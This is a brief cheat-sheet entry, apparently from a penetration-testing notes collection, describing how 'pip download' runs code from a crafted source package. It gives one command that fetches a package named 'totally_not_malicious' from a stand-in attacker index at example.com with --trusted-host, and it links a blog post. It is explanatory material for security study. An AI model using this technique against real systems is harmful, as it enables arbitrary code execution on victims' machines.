# PIP Exploits

## pip download

pip executes code from the downloaded tar file once the `download` option has been triggered.
Therefore, a hand-crafted Python module needs to be created and built.
After that, pip can be used in the following way:
```sh
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
```

A detailed blog post has been written by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/).